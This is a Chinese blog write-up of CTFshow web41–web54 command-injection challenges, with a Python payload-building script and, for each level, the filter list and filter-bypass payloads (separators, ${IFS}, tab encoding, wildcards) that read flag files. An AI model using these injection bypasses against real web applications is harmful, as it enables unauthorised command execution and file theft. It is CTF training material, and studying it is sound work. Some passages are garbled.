最新CTFshow web入门 web41~web55 命令执行_ctfshow web41(2)

def action(arg):
s1 = “”
s2 = “”
for i in arg:
f = open(r"F:\desktop\Learning\CTFtools\Web\phpstudy_pro\phpstudy_pro\WWW\rce.txt", “r”) # 填txt的文件位置
while True:
t = f.readline()
if t == “”:
break
if t[0] == i:
# print(i)
s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = “(”" + s1 + “”|“” + s2 + “”)"
return (output)

while True:
param = action(input(“\n[+] your function：”)) + action(input(“[+] your command：”))
data = {
‘c’: urllib.parse.unquote(param)
}
r = requests.post(url, data=data)
print(“\n[*] result:\n” + r.text)

命令行的使用：

python rce.py [url]

![image-20230413200051409](https://img-blog.csdnimg.cn/img_convert/6547da89a0dd2881f39130be49b0bbc5.png)


### web42(>/dev/null 2>&1)


![image-20230414143622053](https://img-blog.csdnimg.cn/img_convert/acfbe6c4020e4a5d3c80662789435c7b.png)


终于没有preg\_match函数来过滤了，这回里面都是认识的，只不过后面GET传参的c还连接了一个

“>/dev/null 2>&1”

对于这个语句：

/dev/null：
说明一下 /dev/null 说白了就是写入这个里面的内容都会丢失，读取这里面的内容什么也不会读取到
而前面的 > 表示重定向代表的是要去哪里
因为 > 前面没有数值，所以默认的是1，表示标准输出重定向到 /dev/null (空设备文件)
因此不会显示任何的数据，同时也不会读取到任何的数据

2>&1：
这里的1表示stdout标准输出，系统默认值是1，因此 > 前面没有值的时候就是默认标准输出 1>
这里的2表示stderr标准错误
&表示等同于的意思
在这里这个语句的意思就表示2的输出重定向等同于1，即标准错误输出重定向等同于标准输出
因为之前标准输出已经重定向到空设备文件，左移标准错误输出也重定向到空设备文件

这整一句话的意思是：让所有输出流(不管你是对的还是错的)都重定向到空设备文件中丢弃掉


所以关键就是不能让后面这个重定向执行下去就行


构造payload：

c=cat flag.php; // 用 ; 把命令隔断
c=cat flag.php|| // ||表示只执行||前面的语句
c=cat flag.php%0a // %0a是url编码，表示的是换行
c=cat flag.php%26 // %26是url编码，表示的是&符

另外说明一下：
| 表示只执行后面的命令
|| 表示只执行前面的命令
&和&& 表示两条命令都会执行

此外，php版本小于5的时候因为php的底层是C，所以截断有另外的%00可以使用

![image-20230414150643829](https://img-blog.csdnimg.cn/img_convert/196628b1d063f926f3890cb20b505949.png)


### —web43~web52过滤+>/dev/null 2>&1—


### web43(过滤分号、cat)


![image-20230414152050509](https://img-blog.csdnimg.cn/img_convert/0198943384f9ed58913a0f1cbfc9d7a5.png)


这个题其实就是在上一题的基础上多加了个过滤


过滤了

;、cat

说到底，这么多能有回显的函数，也不差cat这一个，形式有这么多，也不差分号这一个


构造payload：

c=nl flag.php%0a
c=more flag.php%0a
c=sort flag.php%0a
c=less flag.php%0a
c=tac flag.php%0a
c=tail flag.php%0a
c=strings flag.php%0a

||也能用

![image-20230414152437329](https://img-blog.csdnimg.cn/img_convert/af21fe3d06a0b1155801ed28f9249922.png)


### web44(过滤flag)


![image-20230414152735431](https://img-blog.csdnimg.cn/img_convert/9f22d446e211f88a47333d63f8fc07b7.png)


过滤了：

;、cat、flag

区区不能使用flag而已，也有构造的形式


构造payload：

c=nl fla*%0a
c=more fla*%0a
c=sort fla*%0a
c=less fla*%0a
c=tac fla*%0a
c=tail fla*%0a
c=strings fla*%0a

||也能用

![image-20230414152954507](https://img-blog.csdnimg.cn/img_convert/cbc5175f5d6b26c0c3b2190516589070.png)


### web45(过滤空格)


![image-20230414153101896](https://img-blog.csdnimg.cn/img_convert/d6fe0bb46241f6ef0a1b73db06ce9b7e.png)


过滤了：

;、cat、flag、[空格]

空格不能用可以使用tab键代替，url编码是%09，反正tab是最多是4个空格，多几个空格也不会怎样


空格绕过：

%09
${IFS}
${IFS}$9
<

构造payload：

?c=nl%09fl*%0a
?c=nl<fla\g.php%0a
?c=echo$IFS‘nl${IFS}fl*`%0a // 反引号表示无回显的命令执行，常配合echo来打印输出

![image-20230414153417153](https://img-blog.csdnimg.cn/img_convert/04d5d9d64a16d997334aada71e5b08bc.png)


### web46(过滤$、\*、数字)


![image-20230414161732696](https://img-blog.csdnimg.cn/img_convert/31195064417d890e9998c1f1d18d1202.png)


过滤了：

;、cat、flag、[空格]、[0-9]、$、*

构造payload：

?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a

![image-20230414162336525](https://img-blog.csdnimg.cn/img_convert/8be4a3ec8e7aef9a8b1b93355d03c00c.png)


### web47(过滤more、less、head、sort、tail)


![image-20230414165009877](https://img-blog.csdnimg.cn/img_convert/c7bb0164e35462064c9986880f688bb1.png)


过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail

构造payload：

?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla*%0a
?c=nl<fla\g.php%0a

![image-20230414165413283](https://img-blog.csdnimg.cn/img_convert/ba1256582de2f9b61a3756053c6389e3.png)


### web48(过滤sed、cut、awk、strings、od、curl、[反引号])


![image-20230414165905048](https://img-blog.csdnimg.cn/img_convert/4e3ee971e84dd74f128b30169a5174d5.png)


过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]

构造payload：

还是一样
?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla\g.php%0a

![image-20230414170312783](https://img-blog.csdnimg.cn/img_convert/4883e94959c3737e5e55c086ebde16fd.png)


### web49(过滤%)


![image-20230414170351596](https://img-blog.csdnimg.cn/img_convert/549bb633966598c777e2e75143e34569.png)


过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%

构造payload：

%被过滤掉了，能用的就少很多了，但还是有
?c=nl<fla’'g.php||
?c=nl<fla\g.php||

![image-20230414185453080](https://img-blog.csdnimg.cn/img_convert/86d6657d7ac77aa367271629bf29fa99.png)


### web50(过滤\x09、\x26)


![image-20230414185606716](https://img-blog.csdnimg.cn/img_convert/f3ddae3ff49faabb463d72784dd94f7b.png)


过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%、\x09、\x26

\x09与\x26的含义其实就是%09（tab键）和%26（&）


构造payload：

?c=nl<fla’'g.php||
?c=nl<fla\g.php||

![image-20230414190207794](https://img-blog.csdnimg.cn/img_convert/70fa339a43b5de5c927a1c2f0e330d84.png)


### web51(过滤tac)


![image-20230414190524086](https://img-blog.csdnimg.cn/img_convert/263f9b79a5d31fac03981422f35eb0ec.png)


过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26

多过滤了一个tac（我寻思着我也不怎么用啊）


构造payload：

?c=nl<fla’'g.php||
?c=nl<fla\g.php||

![image-20230414190729310](https://img-blog.csdnimg.cn/img_convert/d0cfe5c86be0c7455349930fde1922be.png)


### web52(过滤>、<)


![image-20230414191003142](https://img-blog.csdnimg.cn/img_convert/0b693660187647ad36a5aabdae2658fb.png)


过滤了：

;、cat、flag、[空格]、[0-9]、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26、>、<

这回终于把>和<过滤掉了，但 
 
 
 
 
 又给开了， 
 
 
 
 又给开了， 
 
 
 又给开了，想到的第一个就是${IFS}的空格替换


构造payload：

?c=nl${IFS}fla’'g.php||

![image-20230414191702807](https://img-blog.csdnimg.cn/img_convert/cb476199bbb10092067eebc178285b1a.png)


找到了，但没完全找到，去根目录看看有没有东西

?c=ls${IFS}/||

![image-20230414192220112](https://img-blog.csdnimg.cn/img_convert/e7fc2373a8b332e43453ba8092c35d3a.png)


发现有个flag，cat和ls试了一下，都没有回显，看来是个文件，直接nl

?c=nl${IFS}/fla’'g|| // 注意这个/表示根目录下的flag，不加/就会是本目录下的

![image-20230414193225885](https://img-blog.csdnimg.cn/img_convert/585765330be37cb4f1bddcd238768aaf.png)


### web53(过滤+简单代码审计)


[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6ZaP4O5W-1681564193907)(C:/Users/%E7%8B%AC%E8%B4%A4/AppData/Roaming/Typora/typora-user-images/image-20230414193615256.png)]


过滤了：

;、cat、flag、[空格]、[0-9]、*、more、wget、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、`、%、\x09、\x26、>、<

简单分析一下，if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。if判断错误的话会输出no


构造payload：

先在目录看一眼
?c=ls${IFS}

![image-20230414194912462](https://img-blog.csdnimg.cn/img_convert/d0572c0b58cc94e31112ee5b4ef3d73b.png)

直接进flag.php
?c=nl${IFS}fla’'g.php

![image-20230414195130724](https://img-blog.csdnimg.cn/img_convert/e0a27a366a6269870991cf26f6287e01.png)


### web54(grep查找/文件重命名)


![image-20230415185352671](https://img-blog.csdnimg.cn/img_convert/bb72790efcfaacb3bff4270abf83b416.png)


过滤了一堆

; .*c.*a.t. .*f.*l.a.g. [空格] [0-9]、
.*m.*o.*r.e. .*w.*g.*e.t. .*l.*e.*s.s.
.*h.*e.*a.d. .*s.*o.*r.t. .*t.*a.*i.l.
.*s.*e.d. .*c.*u.t. .*t.*a.c. .*a.*w.k.
.*s.*t.*r.*i.*n.*g.s. .*o.d. .*c.*u.*r.l.
.*n.l. .*s.*c.p. .*r.m. ` %
\x09 x26 > <

这回是真正意义上的禁用了这些命令了，以前还能通过中间添加一些特殊符号来绕过的，现在是完全不能使用了，毕竟 . 后面跟上一个通配符后，就完全不能在中间加点什么了


像这种可以选择使用之前讲过的一种用?通配符来构造的方式，如：

对flag.php的构造可以这样：fl??.???
甚至可以简化为：???

同样，命令也可以进行构造
cat可以构造为?at、c??

**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**